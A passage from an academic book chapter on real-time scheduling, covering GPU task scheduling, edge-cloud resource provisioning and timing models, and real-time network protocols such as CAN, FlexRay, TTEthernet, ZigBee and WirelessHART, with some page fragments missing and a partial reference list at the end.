a process known as tiling. Additionally, blocks belonging to the same task cannot
be synchronized, so computations in one thread block cannot be dependent on the
results of computations in another thread block for the same task. When performing
parallel operations, there is a trade-off between launching a kernel with a large block
size and few blocks or small block size and many blocks. If the block size is small,
parallel threads will not take full advantage of all the EUs in an SM, and resources
will sit idle. A thread block can only be allocated to one SM, so launching a kernel as
one block with the maximum number of threads will also fail to take full advantage
of parallelism as the limit on the number of threads executing simultaneously will
be reached, while the remaining SMs sit idle.
Several challenges arise when trying to schedule tasks on a single GPU in a real-
time system. The first is dealing with resource allocation within a single SM where
4 Real-Time Scheduling for Computing Architectures 141
upon release and scheduled for execution across the GPU’s SMs as shown in the
Slate framework (Allen et al. 2019).
All the techniques described here rely on first identifying the execution char-
acteristics of a kernel on a given device offline. Without this knowledge the best
one can do is to allocate specific tasks to specific SMs. In particular, it is not just
the average response time characteristics that need to be known, but the worst-
case ones. This is especially true as two tasks can interact adversely with each
other depending on their location in memory and resource demands. One strategy
to determine this is to purposefully create “enemies” for a given task that seek to
maximize interference (Yandrofski et al. 2022).
Not all real-time systems are limited to a single GPU. In such systems it is necessary
to understand how to schedule a task set across multiple GPUs, given their unique
144 A. Easwaran et al.
Fig. 6 An example of a DAG. Different shaped vertices correspond to tasks that must be run on a
particular type of device. Edges indicate precedence constraints, while the tuple above each vertex
is in the format (task index, worst-case execution time)
Application Domains
GPUs appear in a number of computing domains and face real-time data processing
challenges in each one. The following sections analyse specific challenges in some
common application domains; however, this list is not exhaustive.
Graphics Processing
GPUs were originally designed for the task of graphics processing, which includes
calculating geometric transforms and pixel shading for the rendering of 3D graphics.
Examples of “soft” real-time tasks in this domain are multitasking windowing
systems and high-performance 3D graphics for video games. These tasks are
characterized by a need for low response times, but can still tolerate frame drops.
Dealing with fairness in multitasking graphics systems is one area where GPU task
scheduling is important (Kato et al. 2011b). Additionally, two applications may be
generating graphical output for the GPU to process and this data could be bursty, i.e.
task release times are aperiodic and arrive more frequently in some time intervals
than others. In some graphics systems, hard real-time deadlines are required (Zou
et al. 2023), for example, the instrument cluster of a vehicle. In such cases, graphical
tasks need to be divided across a GPU’s available SMs and schedulability analysis
must be performed to show that the workload is schedulable. There is also a trade-off
between being able to meet hard deadlines and maximizing the GPU’s throughput;
the schedule that maximizes throughput does not necessarily allow all tasks to meet
their deadlines. Some frameworks like TimeGraph Kato et al. (2011b) try to allow
an application to have the best of both worlds by providing two operating modes
that a system can dynamically switch between.
Cloud Systems
Offloading data processing to the cloud is used to increase operational efficiency
and remove the risks of maintaining local hardware for performance computation.
As GPUs can be used for massively parallel computations, it is natural to maintain
GPU clusters in a cloud environment, but such clusters introduce their own
challenges. Firstly, large computations require coordination between multiple GPUs
introducing the same scheduling problems as multi-GPU systems. Additionally,
in the cloud environment, multiple virtual machines (VMs) may be allocated to
share a single GPU. While it is possible to simply partition a GPUs resources in
time and space (parallel SMs), this can lead to severely underutilized hardware
if all running VMs are not using their allocations all the time. To improve upon
this scheme, oversubscription can be allowed (Yao et al. 2023), which allows a
VM to dynamically use more than its share of resources if conditions permit.
Additionally, interference between scheduled tasks on different VMs can lead to
deadline violations of other tasks, and frameworks have been proposed to deal
with this problem in the context of cloud GPUs (Xu et al. 2023). In the cloud, not
every problem requires hard real-time constraints. Sometimes guaranteeing quality
of service (QoS), a probabilistic measure of the availability of a resource, is enough.
4 Real-Time Scheduling for Computing Architectures 147
While such systems do not need to meet every deadline, checks are still needed to
ensure that a given QoS can be maintained given the taskset allocated to a particular
GPU system.
While many scheduling techniques and analyses are applicable to GPUs in general,
there are some caveats for different GPU hardware and software frameworks. The
following section introduces some of the current mainstream frameworks and their
applicability to real-time systems.
OpenCL
OpenCL is an API maintained by several manufacturers with a focus on porta-
bility across devices (AMD 2010). It supports GPUs from Intel, AMD, NVIDIA,
Qualcomm and others as well as field programmable gate array (FPGA) devices
as parallel compute units. In OpenCL terminology, a CU is roughly equivalent
to an SM, a processing element is roughly equivalent to an EU, and a subgroup
is equivalent to a warp. Like ROCm, OpenCL is also open source, but instead
emphasizes portability over performance on one particular platform.
148 A. Easwaran et al.
Alternative Architectures
While so far this section focused on presenting the challenges of real-time schedul-
ing with a generic SIMT architecture, there are several variations on this architecture
that are worth mentioning, as they can also affect the real-time performance of a
CPU-GPU system.
Processing in Memory
A major challenge with all GPU architectures is the amount of time spent trans-
ferring data to and from memory. This is partly due to the physical distance of the
GPU computational units from the on-chip memory. Processing in memory (PIM)
attempts to solve this problem by placing low-power GPU cores physically close to
memory, so that they can operate with low delay on data stored in memory, while
a high-power GPU sits far from memory, but is capable of processing more data
in parallel at higher speeds (Pattnaik et al. 2016). If PIM becomes widely used,
it will face several challenges with regard to real-time performance. Firstly, tasks
need to be scheduled not only in time but also allocated to the low-power or high-
power cores. These task allocations may be dynamic, depending on the nature of
the system. Secondly, PIM seeks to reduce energy usage by placing cores physically
close to memory. Finding a schedule for a taskset that can minimize energy usage
while still meeting deadlines is equally important.
FPGAs as Accelerators
Another alternative to GPUs is to use FPGAs as accelerators for parallel tasks.
FPGAs allow a designer to create their own custom digital logic, which may be
better suited for certain real-time tasks than a generic GPU. Additionally, GPU
caching and memory access schemes make deterministic estimates of response
times very difficult, whereas on an FPGA, the system designer has full control over
these design attributes. In terms of real-time execution, OpenCL already provides
several execution modes unique to FPGA devices that can improve performance
under certain conditions (Jiang et al. 2020).
Fig. 7 Various distributed computing architectures. (a) Sample distributed system. (b) Virtualiza-
tion
among devices in the network to jointly perform the computation at a much higher
rate. The key characteristics of a distributed system include resource sharing,
scalability, concurrency, fault tolerance and heterogeneity. With the advent of
virtualization, a hardware abstraction process, distributed systems evolved into
high-performance heterogeneous servers. Virtualization refers to the process of
creating a virtual layer over the hardware platform to create multiple computing
instances (virtual machines) and execute them simultaneously on the same hardware
platform (host machine).
The advancement in the internet technology made task execution and stor-
age on remote servers feasible with reasonable response times. This has led to
the development of cloud-based applications with service-level agreements that
guarantee a minimum quality of service. The resource allocation in conventional
cloud computing can broadly be classified as reservation-based and on-demand
provisioning. The resources are charged based on the hardware configuration
(CPUs, GPUs and memory), type of provisioning (reservation/on-demand) and
the duration of provisioning (hours/days) (Armbrust et al. 2009). Most common
objective in cloud resource provisioning is the cost and/or energy minimization.
Cloud computing provides resource migrations between servers and replications as
a load balancing and fault-tolerance mechanism, respectively. Fundamentally, the
tasks in cloud computing transmit their data to a centralized server for execution.
However, growing complexity and unprecedented scale of data from a multitude
of distributed edge devices—sensors, Internet-of-things (IoT) devices such as smart
cameras, medical devices—there is a tremendous burden on the network capabilities
of the remote servers.
In order to address this concern, edge computing was introduced wherein the task
execution happens at the edge of the network. Performing the computation closer to
the devices minimizes the response time of tasks as the delay incurred in transmit-
ting the data to the servers is greatly reduced. For instance, modern applications
such as autonomous driving or industrial automation need to transmit huge amount
150 A. Easwaran et al.
of raw data for processing. Such applications require efficient computation and
faster response times for reliable operation. Unlike conventional cloud servers, edge
servers are located closer to the device which enable them to transmit and process
the data at a faster and reliable rate. By allowing storage and execution capabilities
closer to the end devices, edge computing improves the system performance and
also reduces the computation and bandwidth requirement of the devices. Moreover,
the latest 5G network can provide high-speed low-latency communication with
massive network capacity enabling near-real-time analysis and response for edge
devices. Thus, edge computing is an innate choice for designing modern real-time
applications.
The edge resources are modelled as either a set of servers or a tiered network of
servers interconnected by a low-latency, large bandwidth and high-speed backhaul
network for data communication. Internally, the edge servers may be connected
to a larger resource capacity cloud servers using a core network. The edge servers
comprise an access point through which the end devices that are within the coverage
area can access it. A sample edge architecture is shown in Fig. 8.
Computation Resources The edge servers may have multiple hardware resource
types such as processors (both CPUs and GPUs), memories (RAM) and storage
(HDDs and SSDs) or software services such as AI/ML modules, databases, etc.
Depending on the nature of application and the type of problem being addressed, the
Fig. 8 A tiered edge-cloud architecture. Response time and computation resources increase as one
goes higher up
4 Real-Time Scheduling for Computing Architectures 151
term “computation resource” may refer to any of these resources. For instance, the
most widely interpreted resource in this context is the virtual machine (VM) with a
certain configuration of processors, memory and storage. Applications may request
for a certain number of VMs with a specific configuration for a specified (sometimes
unspecified) duration of time. Some studies also abstract the computation resource
as processing cycles per second. Devices may send their (local) data, execute it
using the resources at the edge layer and get the result (processed data) back to the
devices.
The advent of URLLC in 5G has made edge computing a reality for many real-
time applications such as autonomous multi-agent systems, connected cars, digital
twins, etc. To enable the deployment of such real-time systems on edge servers, the
OS used must manage the edge resources, both computation and communication,
more efficiently. Essentially, the OS must allocate resources such that the timing
constraints of the tasks are adhered. In addition, the OS must be capable of
handling time synchronization of devices and servers to facilitate correct schedule
of operation. Owing to the wide variety of devices connected to the network,
ensuring connectivity and maintaining a synchronous notion of time is a challenging
task. Real-time edge computing typically involves three stages: (i) computation
offloading, (ii) resource provisioning and (iii) task scheduling. First, computation
offloading refers to the decision problem of whether to offload the task from the
end device to the edge servers or not. Second, resource provisioning refers to
the allocation problem of communication (bandwidth) and computation resources
(multiple-type resources). Finally, task scheduling problem similar to the CPU
scheduling determines when to execute the task and on which server.
The following presents timing parameters widely adopted in real-time edge
computing and the factors that constitute it. The execution time of an offloading task
depends on the amount of computation resource allocated to it on the edge server.
152 A. Easwaran et al.
The execution time may also include any queuing delay due to the task buffers
implemented at these servers. The queuing delay is the waiting time experienced by
the task due to some pending tasks arrived ahead at the servers. The communication
time is the time required to transmit the data from one entity (device/server) to
another. It depends on the amount of bandwidth allocated to it and the size of
data to be transmitted. The communication time includes the delay incurred in the
transmission medium, due to several factors such as signal strength, noise level,
interference and distance. Since the servers are internally connected by a high-speed
network, the delay incurred in transferring the data between servers is much smaller
compared to the delay in transmitting the data from/to the end devices.
Timing Model Generally, it is assumed that each task (from the device) requests
edge resources for a certain duration of time and may have some timing constraints
associated with it. The response time of an offloading task is given by the
summation of execution time and communication time. The literature in real-time
edge computing focuses on either of the two following timing model:
• Constrained Deadline: The works that bound the response time of the task (hard
real-time tasks) are classified under this category.
• Response Time Minimization: The remaining works are categorized here. This
includes the body of work that minimizes the average task response time or
overall makespan. The makespan is defined as the largest task response time.
Contention Model
Edge resources, although abundant with respect to the end devices, are constrained
by the capacity in general. When multiple tasks are hosted on the edge server, they
tend to have contention between other tasks co-hosted on the same edge server.
Depending on the type of resource these tasks contend, the contention model of the
edge server is broadly classified into:
tasks and the total resources allocated are lower than the capacity of the servers.
Works in this category mainly focus on the task offloading (Kao et al. 2017),
server provisioning (Chen and Xu 2019) and/or task scheduling problems (Guo
et al. 2017) with optimization objectives such as minimizing task response times
(Kao et al. 2017; Chen and Xu 2019) and device energy (Guo et al. 2017).
A greedy task replication strategy for fault tolerance and a multi-arm bandit
learning algorithm based on a probabilistic prediction of task response time
is proposed (Chen and Xu 2019). The server provisioning for tasks and task
scheduling problem is modelled as a collection of trees with end-to-end deadlines
and fixed offloading bandwidth (Guo et al. 2017).
2. Under computation contention, the tasks contend only for the computation
resources in general and it is usually bounded by the computation capacity of
the edge servers. Works in this category mainly focus on the server provisioning
and task scheduling problems with optimization objectives such as minimizing
the task response times (Dai et al. 2018; Ren et al. 2017), device energy
(Yaqub and Sorour 2018) and server energy (Chen et al. 2019). The joint task
offloading and server provisioning problem with fixed offloading bandwidth
for tasks is considered, where the offloading problem is solved using bipartite
graph-based rounding method and the provisioning problem is solved using
gradient descent method (Dai et al. 2018). The same problem is solved for
partial offloading using convex optimization (Ren et al. 2017). A priority-
based heuristic and bisection method for offloading decisions and Lagrangian
method for provisioning problem is considered in Yaqub and Sorour (2018). The
switching costs and energy loss trade-offs for server activations and deactivations
are solved using Vickrey auctions (Chen et al. 2019).
3. Under communication contention, the tasks contend only for the communication
resources in general and it is usually bounded by the bandwidth capacity of
the edge servers. Works in this category mainly focus on task offloading and
server/bandwidth provisioning problems with optimization objectives such as
minimizing server energy (Sun et al. 2017), device energy (Chen et al. 2015),
server usage costs and communication overhead (Yu et al. 2018). A probability
function for the task deadline misses is derived considering the bound on queuing
delay (Sun et al. 2017). The bandwidth is modelled as a function of interference
among tasks and the problem is modelled in a decentralized game-theoretic
framework and solved using potential games. The problem in Yu et al. (2018)
is formulated as a multi-commodity max-flow problem and solved.
4. Under computation and communication contention both the communication and
the computation resources are in general shared by the tasks, both of which
are bounded by their respective capacities. Works in this category mainly focus
on the task offloading, server provisioning and/or task scheduling problems
with optimization objectives such as minimizing task response times (Castellano
et al. 2019; Heydari et al. 2019; Jošilo and Dán 2019), makespan (Pang et al.
2017) and minimizing VM delays (Cziva et al. 2018). The task offloading
problem is formulated as a Markov decision process and actor-critic-based
reinforcement learning heuristic to learn the offloading decisions is proposed in
154 A. Easwaran et al.
The studies covered in this section are developed for single-tier architecture
comprising a set of servers. Similar set of studies can be found in the literature
targeted at multi-tier architecture.
Tiered Architecture
The edge-cloud architecture comprises a multi-layer set of servers interconnected
by a high-speed network. Depending on the assumption of server architecture,
the resource allocation problem dimension changes. For instance, in the case
of computation offloading, the decision problem evolves into consideration of
offloading at the edge or the cloud layer. Besides the offloading of tasks from
the devices, there is also offloading of tasks from edge servers (lower tier) to
cloud servers (higher tier). Likewise, the resource provisioning and task scheduling
need to consider prominent factors such as server-to-server delay and migration
costs between servers. Generally, the multi-layer servers are implemented with task
buffers and adopt a service rate approach for handling task execution as opposed
to conventional resource provisioning due to the difference in resource type and
variation in execution time across the server layers. The following presents some
studies distinct to multi-tier architecture based on the contention model previously
defined.
The server provisioning problem on multi-tier architecture with both compu-
tation and communication contention is formulated as a pure integer non-linear
programming (PINLP) and solved iteratively using a solver in Gao et al. (2019).
A lazy switch algorithm to control the task migration frequency between servers
is also proposed. Considering no contention and constrained deadline model, a
singleton-weighted congestion game-based heuristic was developed to arrive at a
consensus on task allocation at the lower tier (Zhang and Wang 2019). A stochastic
Lyapunov optimization-based greedy heuristic is also considered to estimate task
response times and decide whether to provision the task on another server at the
higher tier. The task offloading and server provisioning problem is formulated as a
mixed integer non-linear programming (MINLP), and a branch and bound algorithm
is designed to find an optimal solution and prune the search space (Vu et al. 2018).
The task scheduling problem with only computation contention is formulated as
a MINLP. The response time is modelled using an M/M/1 queuing model where
M stands for Markovian and one server and solve the optimization problem using
heuristic solution by decomposing the problem into sub-problems (Zeng et al.
2016). An online learning algorithm for joint task offloading and server provisioning
using multi-arm bandit with a parameterized regret bound is presented (Ouyang
et al. 2019). The server provisioning and task scheduling problem with a fixed
4 Real-Time Scheduling for Computing Architectures 155
offloading bandwidth per task and fractional resource allocations is solved optimally
using convex optimization and branch-and-bound methods (Tong et al. 2016). For
the same problem, a decentralized solution by selecting the server with the least
increase in response time and schedule using the shortest remaining computation
time first policy is developed (Tan et al. 2017).
Model Parameters
Several factors attribute to the task response times in edge computing. The three
most explicitly used notions of time in edge computing are the execution time,
deadline and communication time. The execution time or resource reservation
time denotes the fixed duration of time required to execute the task (or use the
resource) on the servers. The deadline denotes the bound on the task response time.
Several deadline constrained studies provide this parameter. The communication
time is considered by those studies that consider an offloading bandwidth for
tasks (fixed/variable). Besides these three explicit parameters, two parameters
indirectly contribute to the task response time under the contention model. The
computation capacity of the edge servers affects the execution time of the task,
whereas the communication capacity of the edge server plays a role in determining
the communication time. This section introduces two model parameters: service
rate and transmission delay. The former refers to the rate at which the tasks are
served (executed) at the server. The latter denotes the additional network delay in
the transmission medium of the system.
1. The service rate and arrival rate of the tasks are considered by relatively fewer
studies in the real-time edge literature (Gao et al. 2019; Xiao and Krunz 2017).
Most works use a Markovian queuing model, either M/M/m or M/M/1, where m
or 1 denotes the number of servers. Under this model, the arrival rate of the tasks
is characterized by a Poisson process and the service time follows an exponential
distribution.
2. The transmission delay in a multi-tier architecture consists of device-server
delay (Gao et al. 2019; Ouyang et al. 2019; Tan et al. 2017; Vu et al. 2018;
Xiao and Krunz 2017) and server-server delay (Ouyang et al. 2019; Vu et al.
2018; Xiao and Krunz 2017). The device-server delay is the time taken by the
device/server to transmit the data vice versa in excess of data transmission time.
This parameter plays a vital role in determining the server for task offloading.
Studies in the literature had modelled it as a constant as well as a variable
parameter. In practice, this translates to the server distance from the device or
the signal strength of access point used for communication. The server-server
delay parameter is usually introduced when dealing with task offloading and
migrations between servers, that is, when tasks are offloaded from one server
to another server, which may or may not be located at the same tier. The task
offloading and server resource provisioning are the two problems pertaining to
this parameter.
The response time of tasks executing in edge servers depends on both the
computation time and the communication time. Most resource allocation studies
156 A. Easwaran et al.
in real-time edge either do not consider the communication delay or abstract the
communication delay between the devices and/or servers using timing parameters.
Guaranteeing end-to-end deadlines in edge computing is not feasible without
incorporating the delay parameters for the communication. Several real-time com-
munication algorithms specific to a communication medium have been designed.
The following section discusses the algorithms and protocols designed for real-time
networks.
(sensors, actuators, motors) and the cloud or edge servers (controllers). Some of
the wired network protocols that are widely adopted for real-time communications
include the control area network (CAN) bus communication networks (Othman
et al. 2006), FlexRay networks (Makowitz and Temple 2006), TTEthernet (Kopetz
et al. 2005), etc. A brief overview of each of these protocols is presented below.
Control Area Network (CAN) A CAN bus is a simple, robust, low-cost and easily
accessible vehicle bus standard designed for communication among the electronic
devices embedded in a vehicle (Othman et al. 2006). Prior to the introduction of the
CAN bus, each electronic device in a car was connected to every other device. With
increase in the implementation of different functions in automobiles, it was very
difficult to maintain the complex wiring system. This led the automotive industry to
introduce the CAN bus system that allows the ECUs to communicate with each
other by connecting each ECU to the common serial bus, thereby reducing the
wiring overheads of the system. Although the CAN bus has been developed for
automobiles, nowadays, it is also used to connect some of the vital components
such as the microcontrollers and the sensors in industries.
The CAN protocol defines a set of rules to transmit and receive messages
through the serial bus. These network devices are known as nodes. The nodes are
equipped with specific hardware and software to enable transmission and reception
of messages. Whenever a node has some data to transmit, it checks the state of
the CAN bus. If the bus is idle, the node writes the data frame on the bus. All the
nodes on the shared bus receive the data frame. This data frame does not contain
the addresses of the transmitting or receiving node. Instead, a unique arbitration ID
labels each data frame. Depending on this ID, the CAN node decides whether to
accept or reject the frame. If multiple nodes attempt to transmit data at the same
time, the node with the lowest arbitration ID gets access to transmit. Thus, nodes
with higher arbitration ID have to wait until the bus becomes available for data
transmission. It has been shown both theoretically and experimentally that the worst-
case response time in a CAN bus is bounded (Tindell et al. 2000). As a result, the
communications among the CAN nodes are deterministic. This ensures predictable
data transmissions with real-time guarantees in a CAN network.
FlexRay Although the CAN bus communication network is flexible and highly
scalable, it has limited bandwidth, i.e. the arbitration process in a CAN bus
does not allow high data rate, and hence, it cannot always guarantee timely
delivery of data. To overcome these drawbacks, FlexRay network protocol was
introduced (Makowitz and Temple 2006). The FlexRay is the first time-triggered
network protocol that is capable of handling both deterministic data arriving at a
specific time frame in a predictable manner and event-triggered data.
The communication in a FlexRay network is time-division multiple access
(TDMA) based, i.e. time is divided into slots and each communication occurs in
such slots. This TDMA based communication in a FlexRay network guarantees
determinism and ensures timely delivery of data. Hence, unlike CAN network,
FlexRay is very suitable for real-time applications. The duration of a time-slot
158 A. Easwaran et al.
depends on the application requirement. All the nodes in a FlexRay network are
synchronized to the same clock. The time-slots for communication are assigned to
the nodes when they join the network. A node can write to the bus only in the slots
assigned to it.
The communications in a FlexRay network occur in cycles, the duration of which
varies between 1 and 5 ms. A communication cycle is divided into four segments:
TTEthernet Although FlexRay has support for both deterministic real-time appli-
cations and event triggered non-real-time applications, it is not scalable for large
complex networks. Thus, Time-Triggered Ethernet (TTEthernet) was specifically
designed to support complex networks in large-scale real-time applications such as
aerospace, automobiles, etc (Kopetz et al. 2005). TTEthernet supports deterministic
real-time communications over the Ethernet providing much more scalability as
compared to CAN or FlexRay networks.
TTEthernet is fully compatible with IEEE 802.3 Ethernet standards (IEEE
2018). In a TTEthernet network, the time-triggered traffic always takes precedence
over standard Ethernet traffic. Thus, TTEthernet guarantees very precise individual
packet level scheduling which makes it very suitable for safety-critical applications.
In addition, TTEthernet also supports packet replication, i.e. each packet is re-
transmitted immediately through another channel if the channel in use becomes
faulty. This helps to overcome failures ensuring reliable communications.
ZigBee The ZigBee wireless protocol is designed to transmit small amounts of data
over a short distance with very low power consumption (Safaric and Malaric 2006).
ZigBee is based on low-rate WPAN (LR-WPAN) technology. It is much simpler
compared to Bluetooth and is based on IEEE 802.15.4 standards (IEEE 2016). It
is highly suitable and widely adopted in smart manufacturing, home automation,
internet-of-things (IoT), WSNs, etc., for its ease of installation, reliable data transfer,
short-range communication, low-cost devices and reasonable battery life.
Two different types of devices are used in ZigBee networks:
• A full functional device (FFD) that can be used either as a PAN coordinator, or
as a coordinator, or as a device
• A reduced functional device (RFD) that can be used in very simple application
A ZigBee network must include at least one FFD to serve as the PAN coordinator.
The PAN coordinator serves as the primary controller of the PAN and is responsible
for initiating, terminating and routing the communication in the network. Based on
the functions associated with the devices, there are three different types of devices
in a ZigBee network: ZigBee Coordinator, ZigBee Router and ZigBee End Device.
A ZigBee network is associated with only one ZigBee Coordinator. However,
the ZigBee network can have multiple ZigBee Routers and multiple ZigBee end
devices.
ZigBee networks are secure and reliable in nature. It supports 128-bit advanced
encryption standard (AES) encryption. The communications in ZigBee are
CSMA/CA based. However, to support low-latency requirements of real-time
applications, the devices in ZigBee can also transmit in some guaranteed time-slots.
The schedule for communications in these guaranteed time-slots is pre-computed in
order to satisfy the deadlines of real-time applications.
WirelessHART The WirelessHART is the most suitable and reliable WSN protocol
that satisfies the hard deadlines and guarantees collision-free deterministic commu-
nications in real-time systems (Chen et al. 2010). It is based on IEEE 802.15.4
standards and is the most widely adopted wireless protocol in industrial control
systems. A WirelessHART network consists of a gateway, multiple field devices,
access points (APs) and a centralized network manager. The network manager,
installed on the gateway, manages the devices, creates the routes, optimizes the
network and generates the transmission schedule for the devices. The field devices
are mainly wireless sensors and actuators. The APs, connected to the gateway,
generate redundant paths between the gateway and the field devices for reliable
communication.
The key characteristic features of a WirelessHART network are as follows.
Real-Time Flow
Release Time The release time of the j th instance of flow Fi , (j ≥ 1) is the time
at which the j th instance of Fi is released at the source node si . The release time
(rij ) is defined as
rij = (k − 1) × pi (1)
Number of hops The number of hops in the route of a flow Fi is the number of
transmissions required to reach the destination node (di ) from the source node (si ).
Scheduling Window Scheduling window (Wij ) of the j th instance of the ith flow
Fi is the time-slots between its release time rij and deadline δij . Time-slot σ ∈ Wij ,
if rij + 1 ≤ σ ≤ δij .
Any real-time flow scheduling algorithm needs to follow the above four con-
straints, i.e. no transmission conflicts, no collision, no deadline violation of flows
and flow sequence preservation, to schedule a real-time flow.
Figure 9 shows a feasible schedule S over the network graph G with two
periodic real-time flows F1 (marked in purple) and F2 (marked in orange) and with
two channels. The flows, F1 and F2 , have their sources at node A and node D,
4 Real-Time Scheduling for Computing Architectures 163
Fig. 9 A feasible schedule S over a network graph G with two periodic real-time flows, F1
(in purple) and F2 (in orange) and two channels. The flows have their sources s1 = A, s2 = D;
destinations, d1 = d2 = B; period p1 = 4 time-slots, p2 = 8 time-slots; relative deadline δ1 = 4
time-slots, δ2 = 8 time-slots; routes R1 = {A → C → B}, R2 = {D → C → B}
respectively. Both of them have their destination at node B. The periods and the
relative deadlines of F1 and F2 are 4 time-slots and 8 time-slots, respectively. Since
the period of the flows is equal to their relative deadlines, the flows have implicit
deadlines. The hyperperiod of the schedule S is 8 time-slots. In this hyperperiod
schedule S, F1 has two flow instances with release time at time-slot 0 and 4 and
F2 has one flow instance with release time at 0. Therefore, the scheduling windows
associated with the two instances of F1 are given by the time-slots in [1,4] and [5,8],
respectively. Similarly, the scheduling window associated with the instance of F2 is
given by the time-slots in [1,8]. Since both the flows require two transmissions to
reach the destination node B from their respective source nodes, the number of hops
for both them is 2.
Routing is defined as the process of selecting paths for the data packets in
the network that are flowing from the source device to the destination device
with proper network traffic management. Routing of data packets in WSNs is
challenging due to several restrictions in the WSNs such as node deployment,
limited energy consumption, scalability, fault tolerance, network heterogeneity,
network connectivity, etc. Based on these factors, some routing algorithms exist
in the literature such as dynamic source routing (DSR) (Johnson and Maltz 1996),
Ad-hoc On-Demand Distance Vector Routing (AODV) (Perkins and Royer 1999),
greedy forwarding (GF) (Takagi and Kleinrock 1984), etc. However, none of these
algorithms satisfy the timeliness requirements of real-time systems. Hence, they are
not applicable for routing real-time flows in the network. The main objective of a
routing algorithm in a real-time system is to route the real-time flows in the best
possible way so that it can guarantee the deadlines of the real-time flows while still
satisfying the transmission delay bound in the network. The following subsections
discuss two popular real-time routing protocols in WSNs.
164 A. Easwaran et al.
Summary
A wide variety of real-time applications are emerging in the fields robotics, automo-
tive, healthcare and smart manufacturing. To guarantee predictability and timeliness,
real-time operating systems are usually deployed on computing platforms used
by these systems. This chapter has explained the characteristics of scheduling in
4 Real-Time Scheduling for Computing Architectures 165
the context of real-time systems for various computing architectures including the
distributed edge servers and communication networks.
The discussion on different computing architectures has shown that the schedul-
ing algorithm and protocols for real-time systems has to consider the implications
of architectural features, execution models and the network topology. In recent
years, more real-time applications are getting built on distributed edge servers
comprising traditional CPUs, GPUs and network. A separate discussion on resource
provisioning schemes for each architecture has shed some insights on achieving both
computation and communication with real-time guarantees.
References
Ali R, Zikria YB, Bashir AK, Garg S, Kim HS (2021) Urllc for 5G and beyond: Requirements,
enabling incumbent technologies and network intelligence. IEEE Access 9:67064–67095.
https://doi.org/10.1109/ACCESS.2021.3073806
Allen T, Feng X, Ge R (2019) Slate: enabling workload-aware efficient multiprocessing for modern
GPGPUs. In: 2019 IEEE international parallel and distributed processing symposium (IPDPS).
IEEE, pp 252–261. https://doi.org/10.1109/IPDPS.2019.00035
AMD (2010) Introduction to OpenCL programming. AMD, Santa Clara
AMD (2023) Introducing AMD CDNA 2 architecture: propelling humanity’s foremost research
with the world’s most powerful HPC and AI accelerator. AMD, Santa Clara
Amert T, Anderson JH (2021) Cupidrt: detecting improper GPU usage in real-time applications. In:
2021 IEEE 24th international symposium on real-time distributed computing (ISORC). IEEE,
pp 86–95. https://doi.org/10.1109/ISORC52013.2021.00022
Amert T, Tong Z, Voronov S, Bakita J, Smith FD, Anderson JH (2021) Timewall: enabling time
partitioning for real-time multicore+accelerator platforms. In: 2021 IEEE real-time systems
symposium (RTSS). IEEE, pp 455–468. https://doi.org/10.1109/RTSS52674.2021.00048
Arena F, Pau G, Severino A (2020) A review on ieee 802.11p for intelligent transportation systems.
J Sens Actuator Netw 9(2). https://doi.org/10.3390/jsan9020022
Armbrust M, Fox A, Griffith R, Joseph AD, Katz RH, Konwinski A, Lee G, Patterson DA, Rabkin
AS, Stoica I, Zaharia MA (2009) Above the clouds: a Berkeley view of cloud computing.
Science 53:07–013
Augonnet C, Namyst R (2009) A unified runtime system for heterogeneous multi-core architec-
tures. In: César E, Alexander M, Streit A, Träff JL, Cérin C, Knüpfer A, Kranzlmüller D, Jha S
(eds) Euro-Par 2008 workshops – parallel processing. Springer, Berlin/Heidelberg, pp 174–183
Bakita J, Anderson JH (2022) Enabling GPU memory oversubscription via transparent paging to an
NVMe SSD. In: 2022 IEEE real-time systems symposium (RTSS). IEEE, pp 370–382. https://
doi.org/10.1109/RTSS55097.2022.00039
Baruah S (2020) Scheduling dags when processor assignments are specified. In: Proceedings of
the 28th international conference on real-time networks and systems, RTNS’20. Association for
Computing Machinery, New York, pp 111–116. https://doi.org/10.1145/3394810.3394813
Baruah S, Mok A, Rosier L (1990a) Preemptively scheduling hard-real-time sporadic tasks on one
processor. In: Proceedings of IEEE real-time systems symposium, pp 182–190. https://doi.org/
10.1109/REAL.1990.128746
Baruah S, Rosier L, Howell R (1990b) Algorithms and complexity concerning the preemptive
scheduling of periodic, real-time tasks on one processor. Real-Time Syst 2:301–324. https://
doi.org/10.1007/BF01995675
Baruah SK, Cohen NK, Plaxton CG, Varvel DA (1993) Proportionate progress: a notion of fairness
in resource allocation. In: Proceedings of the ACM symposium on theory of computing, pp 345–
354
166 A. Easwaran et al.
Basaran C, Kang KD (2012) Supporting preemptive task executions and memory copies in
GPGPUs. In: 2012 24th Euromicro conference on real-time systems. IEEE, pp 287–296. https://
doi.org/10.1109/ECRTS.2012.15
Blackberry (1982) Blackberry QNX. https://blackberry.qnx.com/en. Accessed: 03 Aug 2023
Burns A, Wellings A (2009) Real-time systems and programming languages, 4th edn. Addison
Wesley Longmain. https://www.cs.york.ac.uk/rts/books/RTSBookFourthEdition.html
Buttazzo GC (2011) Hard real-time computing systems: predictable scheduling algorithms and
applications, 3rd edn. Springer Publishing Company, Incorporated
Castellano G, Esposito F, Risso F (2019) A distributed orchestration algorithm for edge computing
resources with guarantees. In: IEEE INFOCOM 2019-IEEE conference on computer commu-
nications. IEEE, pp 2548–2556
Chen D, Nixon M, Mok A (2010) WirelessHART: real-time mesh network for industrial automa-
tion. Springer. https://doi.org/10.1007/978-1-4419-6047-4
Chen L, Xu J (2019) Task replication for vehicular cloud: contextual combinatorial bandit with
delayed feedback. In: IEEE INFOCOM 2019 – IEEE conference on computer communications.
IEEE Press, pp 748–756. https://doi.org/10.1109/INFOCOM.2019.8737654
Chen S, Jiao L, Wang L, Liu F (2019) An online market mechanism for edge emergency
demand response via cloudlet control. In: IEEE INFOCOM 2019-IEEE conference on computer
communications. IEEE, pp 2566–2574
Chen X, Jiao L, Li W, Fu X (2015) Efficient multi-user computation offloading for mobile-edge
cloud computing. IEEE/ACM Trans Netw 24(5):2795–2808
Crow B, Widjaja I, Kim J, Sakai P (1997) IEEE 802.11 wireless local area networks. IEEE
Commun Mag 35(9):116–126, https://doi.org/10.1109/35.620533
